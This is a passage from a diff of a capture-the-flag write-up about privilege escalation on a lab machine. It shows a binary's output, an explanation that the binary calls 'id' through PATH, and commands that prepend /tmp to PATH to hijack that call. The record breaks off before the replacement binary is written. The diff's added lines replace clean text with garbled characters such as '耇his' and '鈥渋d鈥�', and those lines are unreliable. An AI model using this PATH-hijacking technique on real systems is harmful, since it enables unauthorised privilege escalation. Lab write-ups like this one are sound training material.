aswil192/writeups/Lookup.md

 [!]
 ID: www-data
 [-] File /home/www-data/.passwords not found
 ```
- this binary seems to execute the “id” command, and then extracts the username out of it, and then puts that username into “/home/< username >/.passwords” and tries to do something with it
+耇his binary seems to execute the "id" command, and then extracts the username out of it, and then puts that username into "/home/<username>/.passwords" and tries to do something with it

-If the “id” command is not specified with it’s full path (/bin/id), it is found and executed via the PATH variable in our environment.
+If the 鈥渋d鈥� command is not specified with it鈥檚 full path (/bin/id), it is found and executed via the PATH variable in our environment.
 ```
 echo $PATH
 /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
 ```
-add /tmp to the $PATH
+Add /tmp to the $PATH
 ```
 export PATH=/tmp:$PATH
 bash-5.0$ echo $PATH